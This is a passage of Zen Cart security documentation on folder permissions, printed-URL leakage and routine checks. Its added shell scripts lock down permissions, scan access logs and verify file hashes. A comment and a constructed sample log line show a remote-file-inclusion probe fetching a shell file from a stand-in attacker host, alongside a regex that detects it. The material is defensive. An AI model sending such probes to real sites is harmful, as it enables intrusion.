<h1>10. Protecting the "images" and other folders</h1>
During initial installation, you are advised to set your images folder to read/write, so that you can use the Admin interface to upload product/category images without having to use FTP for each one. Similar recommendations are made for other folders and files for various reasons. <br>
<br>
However, leaving the images (or any other) folder writable by the web server means that anyone who can write through the web server (for example via a flaw in another script on the same host) can place malicious files there and then call them from a browser, using the folder as a foothold for further attacks. <br>
<br>
Thus, once your site is built and your images have been loaded, you should reduce the permissions from read/write back to read-only for the web server: change from CHMOD 777 down to 644 for files and 755 for folders. Re-open a folder only for as long as you need to upload through the Admin, and close it again afterwards. <br>
<br>
<h4>File/directory permission settings</h4>
<p>On Linux/Unix hosts, the usual recommended secure permissions are: </p>
<ul>
<li>Directories: 755 </li>
<li>Files: 644 </li>
</ul>
<p>On Windows hosts, marking the files read-only is usually sufficient. Check that the <em>Internet Guest Account</em> is restricted to read-only access.</p>
<h4>What the folders are for</h4>
<p>The folders for which the installer suggests read-write access during setup are listed below. If your host supports .htaccess protection, use it for these folders. (The .htaccess files shipped with v1.3.9 and newer already cover the basics.) </p>
<ul>
<li><span class="filename">/cache</span><br>
This is used to cache database information. The BEST security protection for this is to move it to a folder "above" the webroot (public_html or htdocs or www) area, so that it's not accessible via a browser. (Requires changes to DIR_FS_SQL_CACHE setting in both configure.php files as well as the setting in your admin for Admin > Configuration > Sessions > Session Directory.)</li>
<li><span class="filename">/images</span><br>
Described earlier in this document.</li>
<li><span class="filename">/includes/languages/english/html_includes</span><br>
Described earlier in this document.</li>
<li><span class="filename">/logs</span><br>
This is used to store error logs. The BEST security protection for this is to move it to a folder "above" the webroot (public_html or htdocs or www) area, so that it's not accessible via a browser. (Requires changes to DIR_FS_LOGS setting in both configure.php files.)</li>
<li><span class="filename">/media</span><br>
This is only suggested read-write for the sake of being able to upload music-product media files via the admin. Could be done by FTP as an alternative. </li>
<li><span class="filename">/pub</span><br>
This is used on Linux/Unix hosts to have downloadable products made available to customers via a secure delivery method which doesn't disclose the 'real' location of files/data on your server (so that people can't share a URL and have their friends steal downloads from your site) </li>
<li><span class="filename">/admin/backups</span><br>
Used by the optional backup module to store database backups.</li>
<li><span class="filename">/admin/images/graphs</span><br>
This is used by the Admin > Tools > Banner Manager for updating/displaying bar graphs related to banner usage. If not writable, this feature is ignored. <br>
</li>
</ul>
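<p>As an added example (not a Zen Cart script), the permission changes described in this section written as a small POSIX shell script: it applies 755 to directories and 644 to files, reports anything under the install that is still writable by group or others, and re-opens a single setup folder while you need it. The install path and the <span class="filename">zc_</span> function names are assumptions; the folder list is the one given above.</p>

```sh
#!/bin/sh
# Added example, not a Zen Cart script: apply the 755/644 scheme from the
# text to an install, then list anything still group/world-writable.
# Assumes a POSIX shell with find/chmod; the install path is given as $1.
set -eu

# Folders the installer suggests making writable during setup (from the
# list above). Re-open one of these with zc_reopen only while you need it.
ZC_SETUP_DIRS="cache images includes/languages/english/html_includes logs media pub admin/backups admin/images/graphs"

# zc_lock_down ROOT : directories -> 755, files -> 644
zc_lock_down() {
    find "$1" -type d -exec chmod 755 {} +
    find "$1" -type f -exec chmod 644 {} +
}

# zc_find_writable ROOT : print every file or directory under ROOT that is
# writable by group or others, i.e. what the lock-down missed or what has
# been changed since ("temporary" 777 fixes tend to be forgotten).
zc_find_writable() {
    find "$1" \( -type d -o -type f \) \( -perm -g+w -o -perm -o+w \) -print \
        | LC_ALL=C sort
}

# zc_count_writable ROOT : number of such paths, handy for a cron check
zc_count_writable() {
    zc_find_writable "$1" | wc -l | tr -d ' '
}

# zc_reopen ROOT SUBDIR : temporarily re-open one setup folder for Admin
# uploads. 775 rather than 777 assumes the web server runs as a member of
# the folder owner's group; use 777 only if your host requires it, and run
# zc_lock_down again when the upload is done.
zc_reopen() {
    chmod 775 "$1/$2"
}

# zc_check_setup_dirs ROOT : report which of the setup folders are currently
# writable by group/others (expected: none, once the site is live)
zc_check_setup_dirs() {
    for d in $ZC_SETUP_DIRS; do
        [ -d "$1/$d" ] || continue
        if [ -n "$(find "$1/$d" -prune \( -perm -g+w -o -perm -o+w \) -print)" ]; then
            echo "writable: $d"
        fi
    done
}

# Usage: sh zc_perms.sh /path/to/zencart [lock]
#   without "lock" it only reports; with "lock" it applies 755/644 first.
if [ -n "${1-}" ]; then
    if [ "${2-}" = "lock" ]; then
        zc_lock_down "$1"
    fi
    zc_check_setup_dirs "$1"
    zc_find_writable "$1"
fi
```

<p>Run it in report mode after every upload session; a non-empty listing means something is still open. Note that 644 on files also covers the two configure.php files, which is what the installer asks for once setup is complete.</p>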
<h1>11. Removing the URL from the browser's printed page header</h1>
<p>To stop the browser from printing the page URL (which discloses your Admin folder name) on invoices or any other document printed from the web, follow these steps:</p>
<p>For Internet Explorer:<br>
o Click File, then Page Setup <br>
o In Page Setup, remove the two-character code "&u" from the header or footer text box. </p>
<p>For Firefox:<br>
o Click <em>File</em>, then <em>Page Setup</em><br>
o In the Page Setup window click the "Margins & Header/Footer" tab. In the "Header & Footer" section set all of the drop-downs to --blank-- (or at least remove all references to "Title" and "URL").</p>
<h1>12. Things to check regularly</h1>
<ol><li>Be sure you've done all the steps listed in this document.</li>
<li>Keep good, frequent backups of your website files and database.<ul>
<li>Back up the database over a secure connection (i.e. if you're using phpMyAdmin to back up, make sure you're using HTTPS addresses in your URLs).</li>
<li>Back up the website files over a secure connection. Plain FTP sends your password and your files in the clear; use <a href="http://en.wikipedia.org/wiki/FTPS" target="_blank">FTPS (FTP over SSL/TLS)</a> or SFTP (file transfer over SSH). These are two different protocols, but both encrypt the session. WinSCP supports both, provided you select the corresponding protocol when you configure the connection.</li>
<li>Store the backed-up database and website files in an encrypted file. (You should NOT keep your backups on your server. If you do, encrypt them securely; ask your hosting company for advice.)</li></ul></li>
<li>Check your server's logs regularly for odd or suspicious activity (your hosting control panel should give you access to the Apache error_log; the access_log shows every request, including the successful ones).<ul>
<li>Look for requests for pages that do not exist on your site: these are usually probes for other software (forum or blog scripts, admin tools) that the attacker hopes you are running.</li>
<li>Look for requests in which a query-string value after index.php is itself a URL beginning with http. This is the signature of a remote-file-inclusion attempt, where the attacker tries to make a script fetch and execute code from another server; a patched Zen Cart ignores it, but the attempt tells you your site is being probed.</li></ul></li>
<li>Check your website files regularly to be sure nothing has been added or altered. Comparing against a known-good copy or a checksum list kept off the server is far more reliable than looking at file dates.</li>
<li>Ask your webhost what they have done to ensure the server you're on is safe and secure, so that outsiders cannot do any harm and other websites on the same server cannot be used as a path into your site (in case they have security holes of their own).</li>
<li>If your business warrants it, or you want additional assurance (especially if running forum software or other scripts outside of Zen Cart® on your site), hire a security consultant to check your site regularly; a few dollars buys peace of mind.</li>
<li>Check your Zen Cart /cache/ folder for leftover files that don't belong there.</li>
<li>Check your Zen Cart /logs/ folder for myDebug-XXXXX.log files to see whether any errors are happening that need to be fixed. Delete the log files after you've addressed the errors.</li>
</ol><br>
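<p>As an added example (not part of Zen Cart), two of the routine checks above made repeatable in a POSIX shell script: the log review (a URL appearing as a query-string value after index.php, and requests answered 404) and the file check (a SHA-256 baseline of the webroot, compared on later runs). The Apache combined log format and GNU coreutils <span class="filename">sha256sum</span> are assumed, the <span class="filename">zc_</span> function names are the author's own, and the three sample log lines are constructed for illustration.</p>

```sh
#!/bin/sh
# Added example, not part of Zen Cart. Two of the routine checks from the
# list above, made repeatable:
#  1. scan an Apache (combined format) access log for the "URL after
#     index.php" pattern, i.e. a query-string value that is itself a URL,
#     and for requests answered 404 (probes for pages you do not have);
#  2. keep a SHA-256 baseline of the webroot and report files altered,
#     added or removed since it was taken.
# Assumes GNU coreutils sha256sum and a POSIX shell. The sample log lines
# are constructed for illustration (documentation IP ranges).
set -eu

# zc_scan_log LOGFILE : requests whose query string carries http://, https://
# or ftp:// as a parameter value; a remote-file-inclusion probe looks like
# index.php?main_page=http://attacker.example/shell.txt
zc_scan_log() {
    grep -E '"[A-Z]+ [^ ]*\?[^ ]*=(https?|ftp)://' "$1" || true
}

# zc_scan_404 LOGFILE : requests for pages that are not on your site
# (field 9 of the combined format is the HTTP status code)
zc_scan_404() {
    awk '$9 == 404 { print }' "$1"
}

# zc_baseline ROOT OUTFILE : record a hash of every file under ROOT.
# Keep OUTFILE above the webroot, not inside it, and pass an absolute path.
zc_baseline() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2 ) > "$2"
}

# zc_verify ROOT BASELINE : print "altered", "missing" or "added" plus the
# path for every difference; return 1 if there is any, 0 if the tree is clean.
zc_verify() {
    root=$1 base=$2
    findings=$(
        cd "$root" || exit 1
        # hash mismatches and files that have disappeared since the baseline
        { sha256sum -c --quiet "$base" 2>/dev/null || true; } \
            | sed -e 's/^\(.*\): FAILED open or read$/missing \1/' \
                  -e 's/^\(.*\): FAILED$/altered \1/'
        # files present now that the baseline never saw (e.g. a dropped shell)
        find . -type f -print | LC_ALL=C sort \
            | awk -v base="$base" '
                FILENAME == base { seen[substr($0, index($0, "  ") + 2)] = 1; next }
                !($0 in seen)    { print "added", $0 }' "$base" -
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
}

# zc_sample_log OUTFILE : three constructed combined-format lines: an RFI
# probe, a normal product page view, and a probe for software you don't run.
zc_sample_log() {
    printf '%s\n' \
'203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?main_page=http://attacker.example/shell.txt HTTP/1.1" 200 512 "-" "curl/7.64.0"' \
'198.51.100.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?main_page=product_info&products_id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"' \
'198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"' \
        > "$1"
}

# Usage: sh zc_checks.sh ACCESS_LOG WEBROOT /abs/path/baseline.sha256
#   The first run records the baseline; later runs report differences.
if [ $# -eq 3 ]; then
    zc_scan_log "$1"
    zc_scan_404 "$1"
    if [ -f "$3" ]; then zc_verify "$2" "$3"; else zc_baseline "$2" "$3"; fi
fi
```

<p>Take the baseline right after an upgrade, store it (and the script) outside the webroot, and re-run the verify step from cron; a file reported as "added" under /cache or /images is exactly the leftover the checklist asks you to look for, and "altered" on a core PHP file is a reason to restore from backup rather than to investigate in place.</p>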
</fieldset>